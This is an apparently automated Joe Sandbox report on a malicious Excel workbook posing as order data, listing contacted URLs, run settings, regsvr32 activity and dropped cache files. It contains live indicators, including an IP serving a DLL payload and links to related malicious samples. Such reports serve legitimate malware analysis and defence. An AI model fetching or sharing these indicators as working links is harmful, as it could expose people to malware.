                                                https://tasks.office.comE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/workE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                    high
                                                    https://store.office.cn/addinstemplateE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                      high
                                                      https://globaldisco.crm.dynamics.comE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                        high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                          high
                                                          https://store.officeppe.com/addinstemplateE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://dev0-api.acompli.net/autodetectE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.odwebp.svc.msE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0ssat1_0609_2[1].dll.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://api.powerbi.com/v1.0/myorg/groupsE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                              high
                                                              https://graph.windows.netE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.comE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/apiE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetectE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.jsonE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                          high
                                                                          https://ncus.contentsync.E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspxE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                      high
                                                                                      https://management.azure.comE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                        high
                                                                                        https://wus2.contentsync.E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://incidents.diagnostics.office.comE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/iosE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                            high
                                                                                            http://ocsp.sectigo.com0sat1_0609_2[1].dll.0.drfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://insertmedia.bing.office.net/odc/insertmediaE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.comE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/ActivitiesE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.netE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.comE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                      • 0%, Virustotal, Browse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policiesE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.comE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                          high
                                                                                                          http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#sat1_0609_2[1].dll.0.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office.com/E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocationE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/logE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office365.com/E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                    high
                                                                                                                    https://webshell.suite.office.comE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                      high
                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                        high
                                                                                                                        https://management.azure.com/E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                          high
                                                                                                                          https://login.windows.net/common/oauth2/authorizeE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                            high
                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://graph.windows.net/E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                              high
                                                                                                                              https://api.powerbi.com/beta/myorg/importsE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                                high
                                                                                                                                https://devnull.onenote.comE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://ncus.pagecontentsync.E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://messaging.office.com/E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://augloop.office.com/v2E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://skyapi.live.net/Activity/E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://clients.config.office.net/user/v1.0/macE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://dataservice.o365filtering.comE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://sectigo.com/CPS0sat1_0609_2[1].dll.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://api.cortana.aiE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://onedrive.live.comE1CDFF1D-0935-429C-935F-99A7DA32E11F.0.drfalse
                                                                                                                                                high

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                185.180.199.121
                                                                                                                                                unknownNetherlands
                                                                                                                                                14576HOSTING-SOLUTIONSUSfalse

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                Analysis ID:432263
                                                                                                                                                Start date:09.06.2021
                                                                                                                                                Start time:23:53:51
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 6m 14s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Sample file name:Total_order_data-V2434883.xlsb
                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Number of analysed new started processes analysed:30
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal80.expl.evad.winXLSB@5/10@0/1
                                                                                                                                                EGA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                HDC Information:
                                                                                                                                                • Successful, ratio: 6.3% (good quality ratio 4.2%)
                                                                                                                                                • Quality average: 67.2%
                                                                                                                                                • Quality standard deviation: 46.4%
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                • Number of executed functions: 3
                                                                                                                                                • Number of non-executed functions: 2
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .xlsb
                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                • Attach to Office via COM
                                                                                                                                                • Scroll down
                                                                                                                                                • Close Viewer
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 52.147.198.201, 40.88.32.150, 52.255.188.83, 52.109.76.68, 52.109.88.38, 52.109.8.25, 23.218.208.56, 67.26.83.254, 67.27.157.126, 8.248.113.254, 67.26.73.254, 8.248.131.254, 20.190.160.134, 20.190.160.73, 20.190.160.136, 20.190.160.129, 20.190.160.132, 20.190.160.75, 20.190.160.8, 20.190.160.2, 20.69.130.185, 20.72.88.19, 20.54.26.129, 20.75.105.140, 92.122.213.247, 92.122.213.194, 52.184.81.210
                                                                                                                                                • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, eus2-consumerrp-displaycatalog-aks2aks-useast.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, login.live.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, iris-de-prod-azsc-wus2-b.westus2.cloudapp.azure.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, www.tm.a.prd.aadg.akadns.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-eas-b.eastasia.cloudapp.azure.com, login.msa.msidentity.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                TimeTypeDescription
                                                                                                                                                23:55:38API Interceptor1x Sleep call for process: regsvr32.exe modified

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                185.180.199.121Delivery_Information_7038598.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 185.180.199.121/sat1_0609_2.dll

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                HOSTING-SOLUTIONSUSDelivery_Information_7038598.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 185.180.199.121
                                                                                                                                                W6DkFm55kO.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.248.225.14
                                                                                                                                                Lma2EzVvAK.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.180.198.250
                                                                                                                                                wEcncyxrEeGet hashmaliciousBrowse
                                                                                                                                                • 104.193.252.114
                                                                                                                                                immed_paym_req_44191988.docGet hashmaliciousBrowse
                                                                                                                                                • 185.159.82.194
                                                                                                                                                zKOi8vCorq.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.180.198.99
                                                                                                                                                invoice_100221.docGet hashmaliciousBrowse
                                                                                                                                                • 185.180.198.135
                                                                                                                                                new shippment.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 185.180.198.135
                                                                                                                                                w3QgrgNAWs.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.180.198.99
                                                                                                                                                yWWZnMPf9D.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.180.198.99
                                                                                                                                                zLjBdL6Lbk.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.180.198.141
                                                                                                                                                DHL_file094883764773845.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.244.32.175
                                                                                                                                                https://bit.ly/3547mtOGet hashmaliciousBrowse
                                                                                                                                                • 162.244.32.223
                                                                                                                                                http://436095.com/cwuobmjj/lnclqsrq.html?5crjx3rlwse.eps2kGet hashmaliciousBrowse
                                                                                                                                                • 162.244.32.223
                                                                                                                                                https://bit.ly/2H1vYuPGet hashmaliciousBrowse
                                                                                                                                                • 162.244.32.223
                                                                                                                                                https://bit.ly/33rThahGet hashmaliciousBrowse
                                                                                                                                                • 162.244.32.223
                                                                                                                                                https://bit.ly/3l3ZAqgGet hashmaliciousBrowse
                                                                                                                                                • 162.244.32.223
                                                                                                                                                http://275496.com/socsirmn/imokzmwd.html?2t2i2lh.4lurGet hashmaliciousBrowse
                                                                                                                                                • 162.244.32.223
                                                                                                                                                yXkNVMiowl.docmGet hashmaliciousBrowse
                                                                                                                                                • 185.159.82.237
                                                                                                                                                https://bit.ly/2GrEGSXGet hashmaliciousBrowse
                                                                                                                                                • 162.244.32.223

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\E1CDFF1D-0935-429C-935F-99A7DA32E11F
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):134915
                                                                                                                                                Entropy (8bit):5.369295050894367
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:AcQIKNEeBXA3gBwlpQ9DQW+z7534ZlCKWXboOilX5ENLWME9:IEQ9DQW+zAXOe
                                                                                                                                                MD5:5B697FD2BDEAA84CDA97428A619077E2
                                                                                                                                                SHA1:8A87EAF1F9495BD158120B6908D566147B08E54D
                                                                                                                                                SHA-256:0022C4154594DEE06BD1F1EAF86895E82142E411D808D37F80AB3E5C2CBB29C4
                                                                                                                                                SHA-512:7D1864D285B29EB962B393FF44618602965C9E860ED0762401A3C996934B1121AF0227B421122A548220F419DF5A083F693D5B564F0CC0D1D6D6213C59AFDF4C
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-09T21:54:44">.. Build: 16.0.14207.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\11B5F99.png
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:PNG image data, 168 x 72, 8-bit/color RGB, non-interlaced
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6177
                                                                                                                                                Entropy (8bit):7.959095006853368
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:j6KDvZ3QXkQ288GMDBm6hEeWyS8ITRIVg9gPEnbYhbY0Y4pxCpAueydMT1uZMr0a:j6KTV8WBPhqd9qqYTB6peyeT1oMr0a
                                                                                                                                                MD5:C7ED6FC355D8632DB1464BE3D56BF5CC
                                                                                                                                                SHA1:615484A338922DDF00B903CFA48060AD60D70207
                                                                                                                                                SHA-256:26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C
                                                                                                                                                SHA-512:FB4AE09EACD15A4FE778BDF366808C4F9FE403C4054F86704C03C87C7016E7D7A5772677B69064FCB5F1B9345D80C4263A58EA8B5E9CA2B717E24E2B19B85A92
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview: .PNG........IHDR.......H......m)a....sRGB.........pHYs..........+......IDATx^....E...1.Y. ..."3.(.D......A..(....(.C.X.QP..b.UQAdA..9'I:Hf..f.....s....._.A..s.3...Vu........Z.[.q.P.-9.b..q.......|.r F......c..1..........e.->....@..;n.q..(.bt.q...>F9...[|\.1..]v..A..G..y._3...*3M.YG7.J.)..RK]u.j}.*^J.....R...j.:=}..qN .sV&..F.a.@..Vs.P...%.A......~..w..P.Be.-].4..arss.9~.8d.@.d...."..?.G....z............(.T.......G.;w.?....w....S.H.+...W.^..........E..-_.|....D-....#G.{..<r....P.K..$.{D....kzzz.R....`?..O;........#....tb..g..gU.r>G.......:t........a........p..c..]......M.6.'O.]......8q...RSS.YBB.M.j..}..I.&.:%J.x..7o....d.*U..233.].......E.m}..../^..nt..X.b,..{<....=.....3....z....v..]0.e.}...?.....w..y...)S.L.F.:t..U...+F...l......&...322.6m.../.[.J.a.=..%Kx....E...ys.....z...i.z..g...G...e.7.|.h....!C^x.5k"......<.R..k....4iR.V-.._.~....:..P.O@.y.:..:G=.\...J ...u...]%.T.n.......v..A`Y.......V...^{.X^.I`1w.q........
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\39FE7E0F.png
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:PNG image data, 178 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5744
                                                                                                                                                Entropy (8bit):7.966496386988271
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:4uJgumnoYk22FLjJq17cpKsv+CHI5BXjI1e+HCLDl3kjH1erj+uYU2:4CgJfkfJA7ixCxqe+GDhkT1erj+uYf
                                                                                                                                                MD5:9AD30E24270C495AE68EAF3A1EEECBFB
                                                                                                                                                SHA1:8642D256E7FFBEF5804A2D2220A1FE475A99DC36
                                                                                                                                                SHA-256:6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20
                                                                                                                                                SHA-512:EB156DD0686BAAE4F46B0B0C01838DA7225529D3B31912568D36A1CC07BE006EEAD31F464B0252C3A8471ACA71E86EEE9185FE705ABAE08C56B15C63CC891AD5
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview: .PNG........IHDR.......L.....FpzV....sRGB.........pHYs..........+......IDATx^.\.tTU..u...@@. .b..su....."....+k..Aeu..rX.*.feE..(M.....b..BB.P.f&S_.~w&.I.aH...'...0..........u.2.!...`....8_..,.T.#....,.X...N....NN-l........5`...Z.,..-L..k.":9..Y.,Z..c.Etrja..X.0.G.......f..ha...]......2`.......,..S..e...)<:v.XD'..6.E.Sxt....NN-l........5`...Z.,..-L..k.":9..Yt......9.{.f;...f../Mh...B..GK.....FG.....s...MN.vqp"+.|.m[&11..<O....?...EQ4.H...Z'M... #.T......vS..^..p..)........1...JJr?.gq.V..X..h..T._Zr2g..W^...A./.W...P....q.By.49..5M--.e...5}..{.!.s4M./Xx2.....`...I>s..4U...]...(5.8o>.X.[..xS.w)../.c.Lh..a..uQ.fd.....jh.Z.d..(..=.....#.....o.y....g...-....=?..X.f./..=n|`.j..k.........{.4...b..T.-h..F..;u.x....[!.\....*'Nx^....C..b...8........|F.$.4.......&?.>#.d.\p.R..k..>t0?.-3g..b......s.O..E...4o...\O=.7O=z...u1$n..6..C.]A.X...Z.tX.......I..W.....P...h.@..+q..F.kcI..x\>.....0.4..p....}.~e...).w....%Q.$W......8........PY.k..J....T..b.l
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4C6BD0C6.png
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:PNG image data, 264 x 113, 8-bit/color RGB, non-interlaced
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):9924
                                                                                                                                                Entropy (8bit):7.973758306371751
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:soXrzGktAQUkDfw4om9PEK9u27pwnJyV028/tgXEoCWoB:so9G+fnVEYu27OIW/+XEoCWoB
                                                                                                                                                MD5:B34FB4F2F0F9E70B72BA3AFD028CD97C
                                                                                                                                                SHA1:C6868336F78DEA1E718965DF3341039581DB5B5A
                                                                                                                                                SHA-256:189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB
                                                                                                                                                SHA-512:4795600917F8A67A6C5CBD5713CAACE74E0483F8E6BB6D98EAB63BF24A0F71E537E7F8ABD26808630B247D454A3F467595C8343EEB4EA98AFAB49D81964158D6
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:moderate, very likely benign file
